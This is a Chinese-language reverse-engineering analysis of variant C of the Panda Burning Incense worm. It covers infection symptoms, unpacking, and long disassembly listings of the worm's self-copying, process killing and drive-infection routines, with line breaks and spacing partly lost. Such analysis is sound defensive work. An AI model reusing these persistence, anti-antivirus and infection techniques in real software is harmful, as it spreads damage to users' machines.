熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net一【工具】:Olydbg1.
1、IDA5.
0【任务】:病毒分析以及解决方案【操作平台】:Windows2003server【作者】:LoveBoom[DFCG][FCG][CUG]【链接】:N/A【简要说明】:"离开党和人民一年"、荒废了一年,2006年可所谓沉迷于游戏从帝国到星际,总是追求着自己所谓的目标,而今回头看却发现不但没有达到自己的目标,反而是离生活越走越远了.
现在动手写写也觉得自己穷词:(.
2006过了,不想自己的2007也是这样碌碌无为的过着.
关于这个病毒,我想很多朋友都知道,这个病毒在2007年初闹的比较凶,很多朋友曾经中过这病毒.
这次我给大家带来的文章就是讲讲这个病毒.
看看这病毒到底是怎么回事,我们应该怎么去处理这病毒.
【病毒分析】:概要:这病毒我最早在10月底时接触,那时这病毒并没有现在这样流行(也许是病毒刚出来吧).
曾经几个月的发展,前几天从同事那拿了几个新变种看了会,发现病毒和早期的版本相差比较大.
根据病毒的差异,我自己将病毒分为:ABCD4个变种.
各变种的不同处如下:A病毒将自身复制为%System32%\FuckJacks.
exe,然后感染除特殊文件夹之外的文件夹中的可执行文件.
B病毒将自身复制为%System32%\Drivers\spoclsv.
exe,感染时在c盘根目录下生成感染标记文件.
C病毒不再感染用户系统中的可执行文件,而是感染用户系统中的脚本病毒(这样的危害更大)在每个感染后的文件夹中写下感染标记文件.
D感染用户可执行文件时不再使用A和B版本中的直接捆绑感染.
用户中毒后可执行程序的图标不改变(a和b版本感染后可执行文件的图标都变成熊猫烧香).
今天我分析的就是C版本(下次有空我将整理出A版本的分析资料),小版本可能会有所不同,因此如果你发现你机器上的和我所述的相似但不完全一样也是正常的.
中毒表象:以下几个特征为中毒的表现:1、在系统中的每分区根目录下存在setup.
exe和autorun.
inf文件(A和B盘不感染).
2、无法手工修改"文件夹选项"将隐藏的文件显示出来.
3、在每个感染后的文件夹中可见Desktop_.
ini长度为12字节的隐藏文件(这个和Viking病毒一样).
4、机器上的所有脚本文件(*.
htm*.
html*.
asp*.
php*.
js*.
aspx)中存在以下代码:'5、中毒后机器上的常见反病毒软件无法开启和正常使用.
6、无法正常使用任务管理器、icesword之类的系统检测工具.
7、进程中可以找到伪系统正常进程的spoclsv.
exe病毒进程.
8、系统自启动项中有病毒添加的注册表自启动项.
9、无故的向外发包、连接局域网中的其它机器.
熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net二病毒流程:因为这病毒的流程比较复杂,所以我总结了一下,做了个流程图以方便以后细分析,流程如下:(图1)感染文件部分由以下几部分组成:(图2)初始化复制/释放病毒体感染文件反杀软件/下载病毒结束感染文件感染脚本文件写入AutoRun局域网感染熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net三反杀毒软件及下载病毒由以下以部分组成:(图3)反杀毒软件及下载病毒部分病毒使用timer进行激活事件,各模块激活时间如下:模块名时间(ms)写注册表自启动项1000下载木马1200000下载木马关闭共享10000清除反病毒软件6000反杀软/下载病毒写注册表自启动项下载QQ木马下载QQ木马清除反病毒软件关闭本地默认共享熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net四代码分析:根据上面的流程图,我们现在通过代码将病毒一层一层的解开,我手里的变种版本是加了壳的,由于目标壳比较简单,因此,我只简单的说说怎么脱壳:用od载入目标程序,对照以下说明操作即可:00414280>833D404F41000>CMPDWORDPTRDS:[414F40],0壳比较简单,因此,脱壳这里一笔带过.
004142877505JNZSHORT0041428E00414289E901000000JMP0041428F0041428EC3RETN0041428FE841000000CALL004142D500414294B880424100MOVEAX,OFFSET004142992B05084E4100SUBEAX,DWORDPTRDS:[414E08]0041429FA33C4F4100MOVDWORDPTRDS:[414F3C],EAX004142A4E85E000000CALL00414307004142A9E8E0010000CALL0041448E004142AEE8EC060000CALL0041499F004142B3E8F7050000CALL004148AF004142B8A13C4F4100MOVEAX,DWORDPTRDS:[414F3C]004142BDC705404F41000>MOVDWORDPTRDS:[414F40],1004142C70105004E4100ADDDWORDPTRDS:[414E00],EAX004142CDFF35004E4100PUSHDWORDPTRDS:[414E00]这里push原入口地址004142D3C3RETN这里返回的即是原程序入口004142D4C3RETN脱壳后的程序不可以直接运行,但用IDA分析已经足够了:),下面用ida从病毒初始化处开始:CODE:0040CBBCCODE:0040CBBCSUBROUTINECODE:0040CBBCCODE:0040CBBC病毒程序入口CODE:0040CBBCAttributes:bpbasedframeCODE:0040CBBCCODE:0040CBBCpublicstartCODE:0040CBBCstartprocnearCODE:0040CBBCCODE:0040CBBCvar_18=dwordptr18hCODE:0040CBBCvar_14=dwordptr14hCODE:0040CBBCCODE:0040CBBCpushebpCODE:0040CBBDmovebp,espCODE:0040CBBFaddesp,18h熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net五CODE:0040CBC2pushebxCODE:0040CBC3xoreax,eaxCODE:0040CBC5mov[ebp+var_18],eaxCODE:0040CBC8mov[ebp+var_14],eaxCODE:0040CBCBmoveax,offsetloc_40CB0CCODE:0040CBD0callsub_4049E8CODE:0040CBD5movebx,offsetunk_40E7B8CODE:0040CBDAxoreax,eaxCODE:0040CBDCpushebpCODE:0040CBDDpushoffsetj_@System@@HandleFinally$qqrv_37CODE:0040CBE2pushdwordptrfs:[eax]CODE:0040CBE5movfs:[eax],espCODE:0040CBE8moveax,offsetdword_40E7D4病毒初始化时进行两次字符串比较,如果发现有一点不符合CODE:0040CBE8则退出程序CODE:0040CBEDmovedx,offsetaF"***武*汉*男*生*感*染*下*载*者***"CODE:0040CBF2call@System@@LStrAsg$qqrpvpxvCODE:0040CBF7moveax,offsetunk_40E7D8CODE:0040CBFCmovedx,offsetaMMoperyAV"感谢艾玛,mopery对此木马的关注!
~"CODE:0040CC01call@System@@LStrAsg$qqrpvpxvCODE:0040CC06leaecx,[ebp+var_14]CODE:0040CC09movedx,offsetaXboy_0"xboy"CODE:0040CC0Emoveax,offsetaF_1"***武*汉*男*生*感*染*下*载*者***"CODE:0040CC13callDecryptCODE:0040CC18movedx,[ebp+var_14]CODE:0040CC1Bmoveax,ds:dword_40E7D4CODE:0040CC20call@System@@LStrCmp$qqrv比较字符串,如果不相等则退出程序CODE:0040CC25jzshortloc_40CC30CODE:0040CC27push0uExitCodeCODE:0040CC29callExitProcess_0CODE:0040CC2Ejmpshortloc_40CC81CODE:0040CC30CODE:0040CC30CODE:0040CC30loc_40CC30:CODEXREF:start+69jstart+69jCODE:0040CC30leaecx,[ebp+var_18]CODE:0040CC33movedx,offsetaWhboy"whboy"CODE:0040CC38moveax,offsetaUup2__uxeTmVhj"`uup2.
.
uxe`tm/vhjnx.
fdu/nsm&uyt"熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net六CODE:0040CC3DcallDecrypt这个函数用于解密代码,为了便于查看CODE:0040CC3D我是直接解密后用IDA进行分析CODE:0040CC42movedx,[ebp+var_18]CODE:0040CC45moveax,offsetaUup2__uxeTmV_1"`uup2.
.
uxe`tm/vhjnx.
fdu/nsm&uyt"CODE:0040CC4Acall@System@@LStrCmp$qqrvCODE:0040CC4Fjzshortloc_40CC5A比较两个暗码是否相等,如果不等则overCODE:0040CC51push0uExitCodeCODE:0040CC53callExitProcess_0CODE:0040CC58jmpshortloc_40CC81CODE:0040CC5ACODE:0040CC5ACODE:0040CC5Aloc_40CC5A:CODEXREF:start+93jstart+93jCODE:0040CC5AcallCopy_Virus_to_sp_dir复制病毒至特定文件夹下.
CODE:0040CC5A如果是感染后文件则释放病毒原体和感染前文件.
CODE:0040CC5A然后运行感染前文件.
CODE:0040CC5FcallInfect这里进去就是感染文件模块.
CODE:0040CC64callKill_AV_GetNetInfo清除反病毒软件和下载其它病毒.
CODE:0040CC69jmpshortloc_40CC71CODE:0040CC6BCODE:0040CC6BCODE:0040CC6Bloc_40CC6B:CODEXREF:start+C3jstart+C3jCODE:0040CC6BpushebxlpMsgCODE:0040CC6CcallDispatchMessageACODE:0040CC71CODE:0040CC71loc_40CC71:CODEXREF:start+ADjstart+ADjCODE:0040CC71push0wMsgFilterMaxCODE:0040CC73push0wMsgFilterMinCODE:0040CC75push0hWndCODE:0040CC77pushebxlpMsgCODE:0040CC78callGetMessageACODE:0040CC7Dtesteax,eaxCODE:0040CC7Fjnzshortloc_40CC6BCODE:0040CC81CODE:0040CC81loc_40CC81:CODEXREF:start+72jstart+72jCODE:0040CC81start+9Cjstart+9Cj熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net七CODE:0040CC81xoreax,eaxCODE:0040CC83popedxCODE:0040CC84popecxCODE:0040CC85popecxCODE:0040CC86movfs:[eax],edxCODE:0040CC89pushoffsetaSN"[n"CODE:0040CC8ECODE:0040CC8Eloc_40CC8E:CODEXREF:CODE:0040CCA1jCODE:0040CCA1jCODE:0040CC8Eleaeax,[ebp+var_18]CODE:0040CC91movedx,2CODE:0040CC96call@System@@LStrArrayClr$qqrpviCODE:0040CC9BretnCODE:0040CC9Bstartendpsp=24hCODE:0040CC9B初始化部分还是比较简单,我也就不再多说了.
下面看看病毒复制自身至特定文件夹下,以及运行感染后程序时的处理:Copy_Virus_to_sp_dir:CODE:00408061leaedx,[ebp+appName]CODE:00408067xoreax,eaxCODE:00408069callGetAppFullNameCODE:0040806Emoveax,[ebp+appName]CODE:00408074leaedx,[ebp+FullName_szDesktopini]CODE:0040807AcallGetAppPathCODE:0040807Fleaeax,[ebp+FullName_szDesktopini]CODE:00408085movedx,offsetaDesktop__ini"Desktop_.
ini"CODE:0040808Acall@System@@LStrCat$qqrvCODE:0040808Fmoveax,[ebp+FullName_szDesktopini]CODE:00408095call@Sysutils@FileExists$qqrx17System@AnsiStringCODE:0040809Atestal,alCODE:0040809CjzFileNotExitWayCODE:004080A2pushFILE_ATTRIBUTE_NORMALdwFileAttributesCODE:004080A7leaedx,[ebp+var_3C0]CODE:004080ADxoreax,eaxCODE:004080AFcallGetAppFullNameCODE:004080B4moveax,[ebp+var_3C0]CODE:004080BAleaedx,[ebp+var_3BC]CODE:004080C0callGetAppPathCODE:004080C5leaeax,[ebp+var_3BC]CODE:004080CBmovedx,offsetaDesktop__ini"Desktop_.
ini"CODE:004080D0call@System@@LStrCat$qqrvCODE:004080D5moveax,[ebp+var_3BC]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net八CODE:004080DBcall@System@@LStrToPChar$qqrx17System@AnsiStringCODE:004080E0pusheaxlpFileNameCODE:004080E1callSetFileAttributesA设置病毒同路径下的desktop_.
ini文件属性为normalCODE:004080E6push1dwMillisecondsCODE:004080E8callSleepCODE:004080EDleaedx,[ebp+var_3C8]CODE:004080F3xoreax,eaxCODE:004080F5callGetAppFullNameCODE:004080FAmoveax,[ebp+var_3C8]CODE:00408100leaedx,[ebp+var_3C4]CODE:00408106callGetAppPathCODE:0040810Bleaeax,[ebp+var_3C4]CODE:00408111movedx,offsetaDesktop__ini"Desktop_.
ini"CODE:00408116call@System@@LStrCat$qqrvCODE:0040811Bmoveax,[ebp+var_3C4]CODE:00408121call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:00408126pusheaxlpFileNameCODE:00408127callDeleteFileA删除Desktop_ini文件CODE:0040812CCODE:0040812CFileNotExitWay:CODEXREF:Copy_Virus_to_sp_dir+5CjCopy_Virus_to_sp_dir+5CjCODE:0040812Cleaedx,[ebp+var_3CC]CODE:00408132xoreax,eaxCODE:00408134callGetAppFullNameCODE:00408139moveax,[ebp+var_3CC]CODE:0040813Fleaedx,[ebp+pMem]CODE:00408142callReadFileToMem将病毒文件读取至内存中CODE:00408147leaeax,[ebp+pInfectedFLG]CODE:0040814Acall@System@@LStrClr$qqrpvCODE:0040814Fmoveax,[ebp+pMem]CODE:00408152callunKnowCODE:00408157movebx,eaxCODE:00408159jmpshortloc_40817FCODE:0040815BCODE:0040815BCODE:0040815Bloc_40815B:CODEXREF:Copy_Virus_to_sp_dir+14BjCopy_Virus_to_sp_dir+14BjCODE:0040815Bleaeax,[ebp+var_3D0]CODE:00408161movedx,[ebp+pMem]CODE:00408164movdl,[edx+ebx1]CODE:00408168call@System@@LStrFromChar$qqrr17System@AnsiStringc熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net九CODE:0040816Dmovedx,[ebp+var_3D0]CODE:00408173leaeax,[ebp+pInfectedFLG]CODE:00408176movecx,[ebp+pInfectedFLG]CODE:00408179call@System@@LStrCat3$qqrvCODE:0040817EdecebxCODE:0040817FCODE:0040817Floc_40817F:CODEXREF:Copy_Virus_to_sp_dir+119jCopy_Virus_to_sp_dir+119jCODE:0040817Ftestebx,ebxCODE:00408181jleshortloc_40818DCODE:00408183moveax,[ebp+pMem]CODE:00408186cmpbyteptr[eax+ebx1],0CODE:0040818Bjnzshortloc_40815B判断文件尾最后一位是否为0,如果不为0则跳CODE:0040818B用于判断是感染前还是感染后的文件CODE:0040818DCODE:0040818Dloc_40818D:CODEXREF:Copy_Virus_to_sp_dir+141jCopy_Virus_to_sp_dir+141jCODE:0040818Dcmp[ebp+pInfectedFLG],0CODE:00408191jnzVirusatSysDir_or_infected如果感染标记不为0,则跳去下一步CODE:00408197leaedx,[ebp+szAppName]CODE:0040819Dxoreax,eaxCODE:0040819FcallGetAppFullNameCODE:004081A4moveax,[ebp+szAppName]CODE:004081AAleaedx,[ebp+var_3D4]CODE:004081B0callupcase将路径转为大写CODE:004081B5moveax,[ebp+var_3D4]CODE:004081BBpusheaxCODE:004081BCleaeax,[ebp+szSysDir]CODE:004081C2callGetSysDirCODE:004081C7push[ebp+szSysDir]CODE:004081CDpushoffsetaDrivers"drivers\\"CODE:004081D2pushoffsetaSpoclsv_exe"spoclsv.
exe"CODE:004081D7leaeax,[ebp+var_3E0]CODE:004081DDmovedx,3CODE:004081E2call@System@@LStrCatN$qqrvCODE:004081E7moveax,[ebp+var_3E0]CODE:004081EDleaedx,[ebp+szDriverspoclsv.
exe]CODE:004081F3callupcaseCODE:004081F8movedx,[ebp+szDriverspoclsv.
exe]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十CODE:004081FEpopeaxCODE:004081FFcall@System@@LStrCmp$qqrv判断病毒当前路径是否为:CODE:004081FF%SysDir%\drivers\spoclsv.
exeCODE:00408204jzVirusatSysDir_or_infected如果病毒全路径不为:"%SysDir%\drivers\spoclsv.
ex"CODE:00408204则终止进程中的病毒进程,复制病毒至以上目录中,CODE:00408204然后执行病毒程序.
CODE:0040820Amoveax,offsetaSpoclsv_exe"spoclsv.
exe"CODE:0040820FcallKill_Process终止进程中的病毒CODE:00408214moveax,offsetaSpoclsv_exe"spoclsv.
exe"CODE:00408219callKill_ProcessCODE:0040821Emoveax,offsetaSpoclsv_exe"spoclsv.
exe"CODE:00408223callKill_ProcessCODE:00408228pushFILE_ATTRIBUTE_NORMALCODE:0040822Dleaeax,[ebp+var_3EC]CODE:00408233callGetSysDirCODE:00408238push[ebp+var_3EC]CODE:0040823EpushoffsetaDrivers"drivers\\"CODE:00408243pushoffsetaSpoclsv_exedwFileAttributesCODE:00408248leaeax,[ebp+var_3E8]CODE:0040824Emovedx,3CODE:00408253call@System@@LStrCatN$qqrvCODE:00408258moveax,[ebp+var_3E8]CODE:0040825Ecall@System@@LStrToPChar$qqrx17System@AnsiStringCODE:00408263pusheaxlpFileNameCODE:00408264callSetFileAttributesACODE:00408269push1dwMillisecondsCODE:0040826BcallSleepCODE:00408270push0CODE:00408272leaeax,[ebp+var_3F4]CODE:00408278callGetSysDirCODE:0040827Dpush[ebp+var_3F4]CODE:00408283pushoffsetaDrivers"drivers\\"CODE:00408288pushoffsetaSpoclsv_exebFailIfExistsCODE:0040828Dleaeax,[ebp+var_3F0]CODE:00408293movedx,3CODE:00408298call@System@@LStrCatN$qqrvCODE:0040829Dmoveax,[ebp+var_3F0]CODE:004082A3call@System@@LStrToPChar$qqrx17System@AnsiString熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十一CODE:004082A8pusheaxlpNewFileNameCODE:004082A9leaedx,[ebp+var_3F8]CODE:004082AFxoreax,eaxCODE:004082B1callGetAppFullNameCODE:004082B6moveax,[ebp+var_3F8]CODE:004082BCcall@System@@LStrToPChar$qqrx17System@AnsiStringCODE:004082C1pusheaxlpExistingFileNameCODE:004082C2callCopyFileA复制病毒为%SysDir%\drivers\spoclsv.
exeCODE:004082C7push1CODE:004082C9leaeax,[ebp+var_400]CODE:004082CFcallGetSysDirCODE:004082D4push[ebp+var_400]CODE:004082DApushoffsetaDrivers"drivers\\"CODE:004082DFpushoffsetaSpoclsv_exeuCmdShowCODE:004082E4leaeax,[ebp+var_3FC]CODE:004082EAmovedx,3CODE:004082EFcall@System@@LStrCatN$qqrvCODE:004082F4moveax,[ebp+var_3FC]CODE:004082FAcall@System@@LStrToPChar$qqrx17System@AnsiStringCODE:004082FFpusheaxlpCmdLineCODE:00408300callWinExec执行病毒程序CODE:00408305push0uExitCodeCODE:00408307callExitProcess_0CODE:0040830CCODE:0040830CVirusatSysDir_or_infected:CODEXREF:Copy_Virus_to_sp_dir+151jCopy_Virus_to_sp_dir+151jCODE:0040830CCopy_Virus_to_sp_dir+1C4jCopy_Virus_to_sp_dir+1C4jCODE:0040830Cmoveax,[ebp+pInfectedFLG]是感染后程序或者病毒不在drivers目录下CODE:0040830C则跳到这里执行代码CODE:0040830FcallunKnowCODE:00408314movecx,eaxCODE:00408316leaeax,[ebp+pMem]CODE:00408319movedx,ebxCODE:0040831Bcall@System@@LStrDelete$qqrvCODE:00408320jmploc_4085EF.
.
.
.
.
.
CODE:00408432loc_408432:CODEXREF:Copy_Virus_to_sp_dir+3E6jCopy_Virus_to_sp_dir+3E6jCODE:00408432callCreateTmp_batFile熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十二CODE:00408437moveax,offsetaSpoclsv_exe"spoclsv.
exe"CODE:0040843CcallEnumProcessCODE:00408441testal,alCODE:00408443jnzExitProc_4085E8CODE:00408449pushFILE_ATTRIBUTE_NORMALCODE:0040844Eleaeax,[ebp+var_40C]CODE:00408454callGetSysDirCODE:00408459push[ebp+var_40C]CODE:0040845FpushoffsetaDrivers"drivers\\"CODE:00408464pushoffsetaSpoclsv_exedwFileAttributesCODE:00408469leaeax,[ebp+var_408]CODE:0040846Fmovedx,3CODE:00408474call@System@@LStrCatN$qqrvCODE:00408479moveax,[ebp+var_408]CODE:0040847Fcall@System@@LStrToPChar$qqrx17System@AnsiStringCODE:00408484pusheaxlpFileNameCODE:00408485callSetFileAttributesACODE:0040848Apush1dwMillisecondsCODE:0040848CcallSleepCODE:00408491leaeax,[ebp+var_414]CODE:00408497callGetSysDirCODE:0040849Cpush[ebp+var_414]CODE:004084A2pushoffsetaDrivers"drivers\\"CODE:004084A7pushoffsetaSpoclsv_exe"spoclsv.
exe"CODE:004084ACleaeax,[ebp+var_410]CODE:004084B2movedx,3CODE:004084B7call@System@@LStrCatN$qqrvCODE:004084BCmoveax,[ebp+var_410]CODE:004084C2call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:004084C7pusheaxlpFileNameCODE:004084C8callDeleteFileACODE:004084CDmoveax,[ebp+pMem]CODE:004084D0callunKnowCODE:004084D5movedx,eaxCODE:004084D7subedx,[ebp+var_18]CODE:004084DAleaeax,[ebp+pMem]CODE:004084DDmovecx,[ebp+var_18]CODE:004084E0call@System@@LStrDelete$qqrvCODE:004084E5moveax,[ebp+pMem]CODE:004084E8callunKnowCODE:004084EDpusheaxCODE:004084EEmoveax,[ebp+pMem]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十三CODE:004084F1callunKnowCODE:004084F6movedx,eaxCODE:004084F8leaeax,[ebp+pMem]CODE:004084FBpopecxCODE:004084FCcall@System@@LStrDelete$qqrvCODE:00408501leaeax,[ebp+var_10]CODE:00408504movedx,[ebp+pMem]CODE:00408507call@System@@LStrLAsg$qqrpvpxvCODE:0040850Cxoreax,eaxCODE:0040850EpushebpCODE:0040850Fpushoffsetloc_4085DECODE:00408514pushdwordptrfs:[eax]CODE:00408517movfs:[eax],espCODE:0040851Aleaeax,[ebp+var_41C]CODE:00408520callGetSysDirCODE:00408525push[ebp+var_41C]CODE:0040852BpushoffsetaDrivers"drivers\\"CODE:00408530pushoffsetaSpoclsv_exe"spoclsv.
exe"CODE:00408535leaeax,[ebp+var_418]CODE:0040853Bmovedx,3CODE:00408540call@System@@LStrCatN$qqrvCODE:00408545movedx,[ebp+var_418]CODE:0040854Bleaeax,[ebp+var_3B0]CODE:00408551call@System@@Assign$qqrr15System@TTextRecx17System@AnsiStringCODE:00408556moveax,ds:off_40D2BCCODE:0040855Bmovbyteptr[eax],2CODE:0040855Eleaeax,[ebp+var_3B0]CODE:00408564call@System@@RewritText$qqrr15System@TTextRecCODE:00408569call@System@@_IOTest$qqrvCODE:0040856Emovedx,[ebp+var_10]CODE:00408571leaeax,[ebp+var_3B0]CODE:00408577callsub_404260CODE:0040857Ccall@System@@Flush$qqrr15System@TTextRecCODE:00408581call@System@@_IOTest$qqrvCODE:00408586leaeax,[ebp+var_3B0]CODE:0040858Ccall@System@@Close$qqrr15System@TTextRecCODE:00408591call@System@@_IOTest$qqrvCODE:00408596push1CODE:00408598leaeax,[ebp+var_424]CODE:0040859EcallGetSysDirCODE:004085A3push[ebp+var_424]熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十四CODE:004085A9pushoffsetaDrivers"drivers\\"CODE:004085AEpushoffsetaSpoclsv_exeuCmdShowCODE:004085B3leaeax,[ebp+var_420]CODE:004085B9movedx,3CODE:004085BEcall@System@@LStrCatN$qqrvCODE:004085C3moveax,[ebp+var_420]CODE:004085C9call@System@@LStrToPChar$qqrx17System@AnsiStringCODE:004085CEpusheaxlpCmdLineCODE:004085CFcallWinExecCODE:004085D4xoreax,eaxCODE:004085D6popedx.
.
.
.
.
.
这部分病毒做了什么病毒做了以下操作:病毒首先判断是否为病毒体,不是病毒体则释放出病毒体和感染前文件.
如果是病毒体则判断是否在Drivers目录下运行,不是则终止系统进程中的病毒,然后将自身替换Drivers目录下以已有的病毒体(估计是用于病毒本身的更新).
然后重写Desktop_.
ini文件.
接下来,我们继续看看感染部分,这部分算是病毒的"核心"部分吧,因为如果没有这部分这病毒只能算是个木马下载器:).
感染部分病毒分以下以几部分:CODE:0040CAD0InfectprocnearCODE:0040CAD0callCThread_Infect_DriversCODE:0040CAD5callCTimer_WITE_AUTORUNINFCODE:0040CADAmovax,0AhCODE:0040CADEcallInfect_NetWorkCODE:0040CAE3retnCODE:0040CAE3Infectendp各功能模块分析如下:CThread_Infect_Drivers:CODE:0040A1F6movfs:[eax],espCODE:0040A1F9leaeax,[ebp+szDrivers]CODE:0040A1FCcallGetValid_Root获取有效的分区CODE:0040A201moveax,[ebp+szDrivers]CODE:0040A204callunKnowCODE:0040A209movesi,eax.
.
.
.
.
.
leaedx,[ebp+var_10]CODE:0040A233moveax,offsetaA"a"CODE:0040A238callupcaseCODE:0040A23Dmoveax,[ebp+var_10]CODE:0040A240popedxCODE:0040A241call@System@@LStrPos$qqrvCODE:0040A246testeax,eax熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十五CODE:0040A248jnzshortloc_40A2A6CODE:0040A24Aleaeax,[ebp+var_18]CODE:0040A24Dmovedx,[ebp+szDrivers]CODE:0040A250movdl,[edx+ebx1]CODE:0040A254call@System@@LStrFromChar$qqrr17System@AnsiStringcCODE:0040A259moveax,[ebp+var_18]CODE:0040A25Cleaedx,[ebp+var_14]CODE:0040A25FcallupcaseCODE:0040A264moveax,[ebp+var_14]CODE:0040A267pusheaxCODE:0040A268leaedx,[ebp+var_1C]CODE:0040A26Bmoveax,offsetaB"b"CODE:0040A270callupcaseCODE:0040A275moveax,[ebp+var_1C]CODE:0040A278popedxCODE:0040A279call@System@@LStrPos$qqrvCODE:0040A27Etesteax,eax判断是否为a或b分区,如果是则不进行感染CODE:0040A280jnzshortloc_40A2A6CODE:0040A282leaeax,[ebp+var_20]CODE:0040A285movedx,[ebp+szDrivers]CODE:0040A288movdl,[edx+ebx1]CODE:0040A28Ccall@System@@LStrFromChar$qqrr17System@AnsiStringcCODE:0040A291leaeax,[ebp+var_20]CODE:0040A294movedx,offsetasc_40A2FC":\\"CODE:0040A299call@System@@LStrCat$qqrvCODE:0040A29Emoveax,[ebp+var_20]CODE:0040A2A1callInfect_PathCODE:0040A2A6CODE:0040A2A6loc_40A2A6:CODEXREF:Thread_Infect_Valid_Drivers+6CjThread_Infect_Valid_Drivers+6CjCODE:0040A2A6Thread_Infect_Valid_Drivers+A4jThread_Infect_Valid_Drivers+A4jCODE:0040A2A6decebxCODE:0040A2A7testebx,ebxCODE:0040A2A9jnzloc_40A212.
.
.
.
.
.
其中Infect_Path就是具体的感染文件过程,进去看看(代码比较长,耐心的点看^_^):Infect_Path:CODE:004091F8SUBROUTINECODE:004091F8熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十六CODE:004091F8Attributes:bpbasedframeCODE:004091F8CODE:004091F8Infect_PathprocnearCODEXREF:Scan_Folders+8AApScan_Folders+8AApCODE:004091F8Infect_Path+915pInfect_Path+915p.
.
.
CODE:004091F8CODE:004091F8var_2EC=dwordptr2EChCODE:004091F8var_2E8=dwordptr2E8hCODE:004091F8var_2E4=dwordptr2E4hCODE:004091F8var_2E0=dwordptr2E0h.
.
.
.
.
.
CODE:00409262loc_409262:CODEXREF:Infect_Path+5BjInfect_Path+5BjCODE:00409262leaeax,[ebp+var_178]CODE:00409268movecx,offseta_"*.
*"CODE:0040926Dmovedx,[ebp+szFolderName]查找目录中的所有文件CODE:00409270call@System@@LStrCat3$qqrvCODE:00409275moveax,[ebp+var_178]CODE:0040927Bleaecx,[ebp+var_164]CODE:00409281movedx,3FhCODE:00409286call@Sysutils@FindFirst$qqrx17System@AnsiStringir19Sysutils@TSearchRecCODE:0040928Btesteax,eaxCODE:0040928Djnzclose_FndCODE:00409293CODE:00409293Loop_FndFile:CODEXREF:Infect_Path+C63jInfect_Path+C63jCODE:00409293moveax,[ebp+FNDDATA.
nFileAttrib]CODE:00409299andeax,10hCODE:0040929Ccmpeax,FILE_ATTRIBUTE_DIRECTORYCODE:0040929FjnzIsFileWayCODE:004092A5moveax,[ebp+FNDDATA.
pFileName]CODE:004092ABcmpbyteptr[eax],'.
'CODE:004092AEjzIsFileWayCODE:004092B4[000004C2BYTES:BEGINOFAREACmpisthatspdir.
PRESSKEYPAD""TOCOLLAPSE]CODE:004092B4leaedx,[ebp+var_17C]比较是否为特殊文件夹,如果是则不进行感染CODE:004092BAmoveax,offsetaWindows_0"WINDOWS"CODE:004092BFcallupcaseCODE:004092C4moveax,[ebp+var_17C]CODE:004092CApusheax熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十七CODE:004092CBleaedx,[ebp+var_180]CODE:004092D1moveax,[ebp+FNDDATA.
pFileName]CODE:004092D7callupcaseCODE:004092DCmovedx,[ebp+var_180]CODE:004092E2popeaxCODE:004092E3call@System@@LStrCmp$qqrvCODE:004092E8jzFnd_Next_FileCODE:004092EEleaedx,[ebp+var_184]CODE:004092F4moveax,offsetaWinnt_0"WINNT"CODE:004092F9callupcaseCODE:004092FEmoveax,[ebp+var_184]CODE:00409304pusheaxCODE:00409305leaedx,[ebp+var_188]CODE:0040930Bmoveax,[ebp+FNDDATA.
pFileName]CODE:00409311callupcaseCODE:00409316movedx,[ebp+var_188]CODE:0040931CpopeaxCODE:0040931Dcall@System@@LStrCmp$qqrvCODE:00409322jzFnd_Next_FileCODE:00409328leaedx,[ebp+var_18C]CODE:0040932Emoveax,offsetaSystem32_0"system32"CODE:00409333callupcaseCODE:00409338moveax,[ebp+var_18C]CODE:0040933EpusheaxCODE:0040933Fleaedx,[ebp+var_190]CODE:00409345moveax,[ebp+FNDDATA.
pFileName]CODE:0040934BcallupcaseCODE:00409350movedx,[ebp+var_190]CODE:00409356popeaxCODE:00409357call@System@@LStrCmp$qqrvCODE:0040935CjzFnd_Next_FileCODE:00409362leaedx,[ebp+var_194]CODE:00409368moveax,offsetaDocumentsAnd_0"DocumentsandSettings"CODE:0040936DcallupcaseCODE:00409372moveax,[ebp+var_194]CODE:00409378pusheaxCODE:00409379leaedx,[ebp+var_198]CODE:0040937Fmoveax,[ebp+FNDDATA.
pFileName]CODE:00409385callupcaseCODE:0040938Amovedx,[ebp+var_198]CODE:00409390popeaxCODE:00409391call@System@@LStrCmp$qqrv熊猫病毒分析及解决方案C变种版本Author:LoveBoomEMail:Loveboom@163.
comURL:www.
Loveboom.
net十八CODE:00409396jzFnd_Next_FileCODE:0040939Cleaedx,[ebp+var_19C]CODE:004093A2moveax,offsetaSystemVolume_0"SystemVolumeInformation"CODE:004093A7callupcaseCODE:004093ACmoveax,[ebp+var_19C]CODE:004093B2pusheaxCODE:004093B3leaedx,[ebp+var_1A0]CODE:004093B9moveax,[ebp+FNDDATA.
